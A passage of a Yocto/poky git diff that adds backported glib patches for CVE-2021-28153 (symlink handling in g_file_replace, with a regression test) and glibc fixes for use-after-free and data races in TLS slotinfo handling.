+ gchar *override_text; + gchar *enums; + gint result; ++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" }; ++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" }; ++ const KeyfileTestData keyfile_test_data_long_path = { ++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/", ++ "root", ++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch", ++ "/" ++ }; + + /* Meson build sets this */ + #ifdef TEST_LOCALE_PATH +@@ -2967,6 +3131,11 @@ main (int argc, char *argv[]) + } + + g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown); ++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown); ++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown); + g_test_add_func ("/gsettings/child-schema", test_child_schema); + g_test_add_func ("/gsettings/strinfo", test_strinfo); + g_test_add_func ("/gsettings/enums", test_enums); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch new file mode 100644 index 0000000000..c89ca20726 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch @@ -0,0 +1,27 @@ +From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 24 Feb 2021 17:33:38 +0000 +Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/glocalfileoutputstream.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi + mode = mode_from_flags_or_info (flags, reference_info); + + /* We only need read access to the original file if we are creating a backup. +- * We also add O_CREATE to avoid a race if the file was just removed */ ++ * We also add O_CREAT to avoid a race if the file was just removed */ + if (create_backup || readable) + open_flags = O_RDWR | O_CREAT | O_BINARY; + else diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch new file mode 100644 index 0000000000..8a35bab4de --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch @@ -0,0 +1,42 @@ +From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 24 Feb 2021 17:34:32 +0000 +Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Since a following commit is going to add a new test which references +Gitlab, so it’s best to move the URI bases inside the test cases. + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/tests/file.c | 4 +--- + 1 file changed, 1 insertion(+), 3 deletions(-) + +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -685,7 +685,7 @@ test_replace_cancel (void) + guint count; + GError *error = NULL; + +- g_test_bug ("629301"); ++ g_test_bug ("https://bugzilla.gnome.org/629301"); + + path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error); + g_assert_no_error (error); +@@ -1784,8 +1784,6 @@ main (int argc, char *argv[]) + { + g_test_init (&argc, &argv, NULL); + +- g_test_bug_base ("http://bugzilla.gnome.org/"); +- + g_test_add_func ("/file/basic", test_basic); + g_test_add_func ("/file/build-filename", test_build_filename); + g_test_add_func ("/file/parent", test_parent); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch new file mode 100644 index 0000000000..a82febd26e --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch @@ -0,0 +1,57 @@ +Backport of: + +From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 10 Mar 2021 16:05:55 +0000 +Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check + +This clarifies the code a little. It introduces no functional changes. + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/glocalfileoutputstream.c | 7 ++++--- + 1 file changed, 4 insertions(+), 3 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi + int res; + int mode; + int errsv; ++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION); + + mode = mode_from_flags_or_info (flags, reference_info); + +@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi + * to a backup file and rewrite the contents of the file. + */ + +- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) || ++ if (replace_destination_set || + (!(original_stat.st_nlink > 1) && !is_symlink)) + { + char *dirname, *tmp_filename; +@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi + + /* try to keep permissions (unless replacing) */ + +- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) && ++ if (!replace_destination_set && + ( + #ifdef HAVE_FCHOWN + fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 || +@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi + } + } + +- if (flags & G_FILE_CREATE_REPLACE_DESTINATION) ++ if (replace_destination_set) + { + g_close (fd, NULL); + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch new file mode 100644 index 0000000000..5b106e8474 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch @@ -0,0 +1,265 @@ +Backport of: + +From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 24 Feb 2021 17:36:07 +0000 +Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION + with symlinks +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking +the destination file and re-creating it from scratch. That did +previously work, but in the process the code would call `open(O_CREAT)` +on the file. If the file was a dangling symlink, this would create the +destination file (empty). That’s not an intended side-effect, and has +security implications if the symlink is controlled by a lower-privileged +process. + +Fix that by not opening the destination file if it’s a symlink, and +adjusting the rest of the code to cope with + - the fact that `fd == -1` is not an error iff `is_symlink` is true, + - and that `original_stat` will contain the `lstat()` results for the + symlink now, rather than the `stat()` results for its target (again, + iff `is_symlink` is true). + +This means that the target of the dangling symlink is no longer created, +which was the bug. The symlink itself continues to be replaced (as +before) with the new file — this is the intended behaviour of +`g_file_replace()`. + +The behaviour for non-symlink cases, or cases where the symlink was not +dangling, should be unchanged. + +Includes a unit test. + +Signed-off-by: Philip Withnall + +Fixes: #2325 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/glocalfileoutputstream.c | 77 ++++++++++++++++++------- + gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++ + 2 files changed, 163 insertions(+), 22 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi + /* Could be a symlink, or it could be a regular ELOOP error, + * but then the next open will fail too. */ + is_symlink = TRUE; +- fd = g_open (filename, open_flags, mode); ++ if (!replace_destination_set) ++ fd = g_open (filename, open_flags, mode); + } +-#else +- fd = g_open (filename, open_flags, mode); +- errsv = errno; ++#else /* if !O_NOFOLLOW */ + /* This is racy, but we do it as soon as possible to minimize the race */ + is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK); ++ ++ if (!is_symlink || !replace_destination_set) ++ { ++ fd = g_open (filename, open_flags, mode); ++ errsv = errno; ++ } + #endif + +- if (fd == -1) ++ if (fd == -1 && ++ (!is_symlink || !replace_destination_set)) + { + char *display_name = g_filename_display_name (filename); + g_set_error (error, G_IO_ERROR, +@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi + #ifdef G_OS_WIN32 + res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat); + #else +- res = fstat (fd, &original_stat); ++ if (!is_symlink) ++ { ++ res = fstat (fd, &original_stat); ++ } ++ else ++ { ++ res = lstat (filename, &original_stat); ++ } + #endif + errsv = errno; + +@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi + if (!S_ISREG (original_stat.st_mode)) + { + if (S_ISDIR (original_stat.st_mode)) +- g_set_error_literal (error, +- G_IO_ERROR, +- G_IO_ERROR_IS_DIRECTORY, +- _("Target file is a directory")); +- else +- g_set_error_literal (error, ++ { ++ g_set_error_literal (error, ++ G_IO_ERROR, ++ G_IO_ERROR_IS_DIRECTORY, ++ _("Target file is a directory")); ++ goto err_out; ++ } ++ else if (!is_symlink || ++#ifdef S_ISLNK ++ !S_ISLNK (original_stat.st_mode) ++#else ++ FALSE ++#endif ++ ) ++ { ++ g_set_error_literal (error, + G_IO_ERROR, + G_IO_ERROR_NOT_REGULAR_FILE, + _("Target file is not a regular file")); +- goto err_out; ++ goto err_out; ++ } + } + + if (etag != NULL) +@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi + } + } + +- g_close (fd, NULL); ++ if (fd >= 0) ++ g_close (fd, NULL); + *temp_filename = tmp_filename; + return tmpfd; + } +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -804,6 +804,113 @@ test_replace_cancel (void) + g_object_unref (tmpdir); + } + ++static void ++test_replace_symlink (void) ++{ ++#ifdef G_OS_UNIX ++ gchar *tmpdir_path = NULL; ++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL; ++ GFileOutputStream *stream = NULL; ++ const gchar *new_contents = "this is a test message which should be written to source and not target"; ++ gsize n_written; ++ GFileEnumerator *enumerator = NULL; ++ GFileInfo *info = NULL; ++ gchar *contents = NULL; ++ gsize length = 0; ++ GError *local_error = NULL; ++ ++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325"); ++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks"); ++ ++ /* Create a fresh, empty working directory. */ ++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error); ++ g_assert_no_error (local_error); ++ tmpdir = g_file_new_for_path (tmpdir_path); ++ ++ g_test_message ("Using temporary directory %s", tmpdir_path); ++ g_free (tmpdir_path); ++ ++ /* Create symlink `source` which points to `target`. */ ++ source_file = g_file_get_child (tmpdir, "source"); ++ target_file = g_file_get_child (tmpdir, "target"); ++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ /* Ensure that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Replace the `source` symlink with a regular file using ++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without* ++ * following the symlink */ ++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */, ++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents), ++ &n_written, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpint (n_written, ==, strlen (new_contents)); ++ ++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&stream); ++ ++ /* At this point, there should still only be one file: `source`. It should ++ * now be a regular file. `target` should not exist. */ ++ enumerator = g_file_enumerate_children (tmpdir, ++ G_FILE_ATTRIBUTE_STANDARD_NAME "," ++ G_FILE_ATTRIBUTE_STANDARD_TYPE, ++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_nonnull (info); ++ ++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source"); ++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR); ++ ++ g_clear_object (&info); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_null (info); ++ ++ g_file_enumerator_close (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_clear_object (&enumerator); ++ ++ /* Double-check that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Check the content of `source`. */ ++ g_file_load_contents (source_file, ++ NULL, ++ &contents, ++ &length, ++ NULL, ++ &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpstr (contents, ==, new_contents); ++ g_assert_cmpuint (length, ==, strlen (new_contents)); ++ g_free (contents); ++ ++ /* Tidy up. */ ++ g_file_delete (source_file, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_file_delete (tmpdir, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&target_file); ++ g_clear_object (&source_file); ++ g_clear_object (&tmpdir); ++#else /* if !G_OS_UNIX */ ++ g_test_skip ("Symlink replacement tests can only be run on Unix") ++#endif ++} ++ + static void + on_file_deleted (GObject *object, + GAsyncResult *result, +@@ -1752,6 +1859,7 @@ main (int argc, char *argv[]) + g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete); + g_test_add_func ("/file/replace-load", test_replace_load); + g_test_add_func ("/file/replace-cancel", test_replace_cancel); ++ g_test_add_func ("/file/replace-symlink", test_replace_symlink); + g_test_add_func ("/file/async-delete", test_async_delete); + #ifdef G_OS_UNIX + g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch new file mode 100644 index 0000000000..2334147f7d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch @@ -0,0 +1,55 @@ +From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 24 Feb 2021 17:42:24 +0000 +Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to + replace() + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/glocalfileoutputstream.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -58,6 +58,12 @@ + #define O_BINARY 0 + #endif + ++#ifndef O_CLOEXEC ++#define O_CLOEXEC 0 ++#else ++#define HAVE_O_CLOEXEC 1 ++#endif ++ + struct _GLocalFileOutputStreamPrivate { + char *tmp_filename; + char *original_filename; +@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con + sync_on_close = FALSE; + + /* If the file doesn't exist, create it */ +- open_flags = O_CREAT | O_EXCL | O_BINARY; ++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC; + if (readable) + open_flags |= O_RDWR; + else +@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con + set_error_from_open_errno (filename, error); + return NULL; + } +- +- ++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD) ++ else ++ fcntl (fd, F_SETFD, FD_CLOEXEC); ++#endif ++ + stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL); + stream->priv->fd = fd; + stream->priv->sync_on_close = sync_on_close; diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb index 1a006b9f38..c2145bc6c2 100644 --- a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb @@ -18,6 +18,30 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \ file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \ file://tzdata-update.patch \ file://CVE-2020-35457.patch \ + file://CVE-2021-27218.patch \ + file://CVE-2021-27219-01.patch \ + file://CVE-2021-27219-02.patch \ + file://CVE-2021-27219-03.patch \ + file://CVE-2021-27219-04.patch \ + file://CVE-2021-27219-05.patch \ + file://CVE-2021-27219-06.patch \ + file://CVE-2021-27219-07.patch \ + file://CVE-2021-27219-08.patch \ + file://CVE-2021-27219-09.patch \ + file://CVE-2021-27219-10.patch \ + file://CVE-2021-27219-11.patch \ + file://CVE-2021-27219-reg1-1.patch \ + file://CVE-2021-27219-reg1-2.patch \ + file://CVE-2021-27219-reg1-4.patch \ + file://CVE-2021-27219-reg1-5.patch \ + file://CVE-2021-27219-reg2-1.patch \ + file://CVE-2021-27219-reg2-2.patch \ + file://CVE-2021-27219-reg2-3.patch \ + file://CVE-2021-28153-1.patch \ + file://CVE-2021-28153-2.patch \ + file://CVE-2021-28153-3.patch \ + file://CVE-2021-28153-4.patch \ + file://CVE-2021-28153-5.patch \ " SRC_URI_append_class-native = " file://relocate-modules.patch" diff --git a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb index 24de55d929..9aa24eccfe 100644 --- a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb +++ b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb @@ -20,7 +20,7 @@ inherit autotools FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:" SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ - git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \ + git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \ \ file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \ \ diff --git a/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch new file mode 100644 index 0000000000..dba491f4dc --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch @@ -0,0 +1,66 @@ +From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Wed, 30 Dec 2020 21:52:38 +0000 +Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free + +map is not valid to access here because it can be freed by a concurrent +dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is +called without holding dlopen locks. So don't check the modid of map. + +The map == 0 and map != 0 code paths can be shared (avoiding the dtv +resize in case of map == 0 is just an optimization: larger dtv than +necessary would be fine too). + +Reviewed-by: Adhemerval Zanella +--- + elf/dl-tls.c | 21 +++++---------------- + 1 file changed, 5 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee] +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 24d00c14ef..f8b32b3ecb 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt) + { ++ size_t modid = total + cnt; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid) + + /* If there is no map this means the entry is empty. */ + struct link_map *map = listp->slotinfo[cnt].map; +- if (map == NULL) +- { +- if (dtv[-1].counter >= total + cnt) +- { +- /* If this modid was used at some point the memory +- might still be allocated. */ +- free (dtv[total + cnt].pointer.to_free); +- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED; +- dtv[total + cnt].pointer.to_free = NULL; +- } +- +- continue; +- } +- + /* Check whether the current dtv array is large enough. */ +- size_t modid = map->l_tls_modid; +- assert (total + cnt == modid); + if (dtv[-1].counter < modid) + { ++ if (map == NULL) ++ continue; ++ + /* Resize the dtv. */ + dtv = _dl_resize_dtv (dtv); + +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch new file mode 100644 index 0000000000..25beee1d50 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch @@ -0,0 +1,191 @@ +From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ + #19329] + +DTV setup at thread creation (_dl_allocate_tls_init) is changed +to take the dlopen lock, GL(dl_load_lock). Avoiding data races +here without locks would require design changes: the map that is +accessed for static TLS initialization here may be concurrently +freed by dlclose. That use after free may be solved by only +locking around static TLS setup or by ensuring dlclose does not +free modules with static TLS, however currently every link map +with TLS has to be accessed at least to see if it needs static +TLS. And even if that's solved, still a lot of atomics would be +needed to synchronize DTV related globals without a lock. So fix +both bug 19329 and bug 27111 with a lock that prevents DTV setup +running concurrently with dlopen or dlclose. + +_dl_update_slotinfo at TLS access still does not use any locks +so CONCURRENCY NOTES are added to explain the synchronization. +The early exit from the slotinfo walk when max_modid is reached +is not strictly necessary, but does not hurt either. + +An incorrect acquire load was removed from _dl_resize_dtv: it +did not synchronize with any release store or fence and +synchronization is now handled separately at thread creation +and TLS access time. + +There are still a number of racy read accesses to globals that +will be changed to relaxed MO atomics in a followup patch. This +should not introduce regressions compared to existing behaviour +and avoid cluttering the main part of the fix. + +Not all TLS access related data races got fixed here: there are +additional races at lazy tlsdesc relocations see bug 27137. + +Reviewed-by: Adhemerval Zanella +--- + elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++------------- + 1 file changed, 47 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54] +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 6baff0c1ea..94f3cdbae0 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[]; + #endif + + static dtv_t * +-_dl_resize_dtv (dtv_t *dtv) ++_dl_resize_dtv (dtv_t *dtv, size_t max_modid) + { + /* Resize the dtv. */ + dtv_t *newp; +- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by +- other threads concurrently. */ +- size_t newsize +- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS; ++ size_t newsize = max_modid + DTV_SURPLUS; + size_t oldsize = dtv[-1].counter; + + if (dtv == GL(dl_initial_dtv)) +@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result) + size_t total = 0; + size_t maxgen = 0; + ++ /* Protects global dynamic TLS related state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ + /* Check if the current dtv is big enough. */ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) + { + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx)); + + /* Install this new dtv in the thread data structures. */ + INSTALL_DTV (result, &dtv[-1]); +@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result) + listp = listp->next; + assert (listp != NULL); + } ++ __rtld_lock_unlock_recursive (GL(dl_load_lock)); + + /* The DTV version is up-to-date now. */ + dtv[0].counter = maxgen; +@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid) + + if (dtv[0].counter < listp->slotinfo[idx].gen) + { +- /* The generation counter for the slot is higher than what the +- current dtv implements. We have to update the whole dtv but +- only those entries with a generation counter <= the one for +- the entry we need. */ ++ /* CONCURRENCY NOTES: ++ ++ Here the dtv needs to be updated to new_gen generation count. ++ ++ This code may be called during TLS access when GL(dl_load_lock) ++ is not held. In that case the user code has to synchronize with ++ dlopen and dlclose calls of relevant modules. A module m is ++ relevant if the generation of m <= new_gen and dlclose of m is ++ synchronized: a memory access here happens after the dlopen and ++ before the dlclose of relevant modules. The dtv entries for ++ relevant modules need to be updated, other entries can be ++ arbitrary. ++ ++ This e.g. means that the first part of the slotinfo list can be ++ accessed race free, but the tail may be concurrently extended. ++ Similarly relevant slotinfo entries can be read race free, but ++ other entries are racy. However updating a non-relevant dtv ++ entry does not affect correctness. For a relevant module m, ++ max_modid >= modid of m. */ + size_t new_gen = listp->slotinfo[idx].gen; + size_t total = 0; ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); ++ assert (max_modid >= req_modid); + + /* We have to look through the entire dtv slotinfo list. */ + listp = GL(dl_tls_dtv_slotinfo_list); +@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + size_t modid = total + cnt; + ++ /* Later entries are not relevant. */ ++ if (modid > max_modid) ++ break; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +- /* This is a slot for a generation younger than the +- one we are handling now. It might be incompletely +- set up so ignore it. */ ++ /* Not relevant. */ + continue; + + /* If the entry is older than the current dtv layout we +@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid) + continue; + + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, max_modid); + + assert (modid <= dtv[-1].counter); + +@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid) + } + + total += listp->len; ++ if (total > max_modid) ++ break; ++ ++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would ++ be consume MO since we only need to order the accesses to ++ the next node after the read of the address and on most ++ hardware (other than alpha) a normal load would do that ++ because of the address dependency. */ ++ listp = atomic_load_acquire (&listp->next); + } +- while ((listp = listp->next) != NULL); ++ while (listp != NULL); + + /* This will be the new maximum generation counter. */ + dtv[0].counter = new_gen; +@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add) + the first slot. */ + assert (idx == 0); + +- listp = prevp->next = (struct dtv_slotinfo_list *) ++ listp = (struct dtv_slotinfo_list *) + malloc (sizeof (struct dtv_slotinfo_list) + + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); + if (listp == NULL) +@@ -1000,6 +1029,8 @@ cannot create TLS data structures")); + listp->next = NULL; + memset (listp->slotinfo, '\0', + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); ++ /* Synchronize with _dl_update_slotinfo. */ ++ atomic_store_release (&prevp->next, listp); + } + + /* Add the information into the slotinfo data structure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch new 